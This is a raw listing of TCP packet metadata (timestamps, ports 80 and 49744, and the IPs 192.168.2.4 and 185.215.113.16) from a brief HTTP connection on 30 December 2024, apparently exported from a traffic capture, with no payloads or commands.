Dec 30, 2024 15:53:36.737216949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737232924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737240076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737248898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737265110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737276077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737309933 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737591982 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737611055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737624884 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737639904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737649918 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737677097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737684965 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737694025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737708092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737724066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737739086 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737755060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737760067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737765074 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737770081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737785101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737799883 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737807989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737822056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737828016 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737840891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737854958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737858057 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737870932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737886906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737890959 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737901926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737910986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737919092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737934113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737941027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737951040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737967014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737974882 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738054991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738069057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738094091 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738101006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738116980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738123894 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738164902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738176107 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738181114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738194942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738210917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738219023 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738225937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738264084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738281012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738296986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738312006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738322020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738349915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738384008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738409996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738425970 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738440990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738456011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738471985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738488913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738497019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738521099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738528967 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738543987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738563061 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738596916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738614082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738627911 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738643885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738658905 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738660097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738693953 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738702059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738738060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738753080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738769054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738784075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738795996 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738820076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738828897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738843918 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738859892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738876104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738892078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738898039 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738905907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738922119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738928080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738939047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.738946915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.738985062 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.739162922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739177942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739192963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739208937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739226103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739237070 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.739242077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739257097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.739267111 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.739288092 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.742364883 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742381096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742397070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742413998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742482901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.742929935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742954016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742971897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.742995977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743005991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743010044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743019104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743031025 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743050098 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743055105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743072033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743100882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743117094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743134022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743149996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743155956 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743166924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743191004 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743212938 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743228912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743244886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743258953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743273973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743283987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743303061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743330002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743331909 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743345022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743388891 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743436098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743451118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743467093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743482113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743499041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743501902 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743514061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743520975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743530989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743545055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743546009 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743560076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743568897 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743577957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743593931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743606091 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743635893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743735075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743750095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743765116 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743781090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743796110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743809938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743813038 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743824959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743834972 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743840933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743858099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743865013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743879080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743885994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743895054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743910074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743942022 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743963957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743968010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.743978977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.743994951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744009018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744024992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744038105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744048119 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744080067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744101048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744116068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744131088 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744153023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744154930 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744168997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744184017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744199038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744211912 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744213104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744230032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744241953 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744246006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744250059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744268894 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744285107 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744288921 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744299889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744337082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744438887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744453907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744468927 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744478941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744484901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744499922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744515896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744518042 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744532108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744539976 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744546890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744559050 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744571924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744586945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744596004 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744602919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744626045 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744626045 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744642019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744649887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744657993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744673014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744680882 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744688988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744705915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744713068 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744755983 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744919062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744934082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744949102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744965076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744981050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.744988918 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.744997025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745012045 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745017052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745027065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745035887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745043039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745064974 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745064974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745088100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745104074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745119095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745126963 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745134115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745150089 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745158911 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745168924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745174885 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745184898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745199919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745208025 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745239019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.745240927 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.745413065 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.749653101 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.749669075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.749685049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.749733925 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.749794006 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750339985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750365019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750425100 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750430107 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750446081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750461102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750483990 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750516891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750533104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750549078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750566959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750590086 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750605106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750610113 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750621080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750637054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750653028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750654936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750669003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750675917 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750729084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750761032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750777960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750792980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750821114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750838041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750854015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750869989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750885963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750901937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750917912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750942945 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.750988960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.750991106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751003981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751019955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751034975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751044989 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751059055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751074076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751090050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751096010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751105070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751120090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751125097 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751136065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751143932 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751152992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751168966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751185894 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751189947 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751209974 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751408100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751424074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751445055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751444101 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751460075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751475096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751490116 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751499891 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751506090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751521111 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751530886 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751534939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751550913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751557112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751564980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751580000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751578093 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751595020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751605988 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751610041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751626015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.751640081 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.751642942 CET	80	49744	185.215.113.16	192.168.2.4
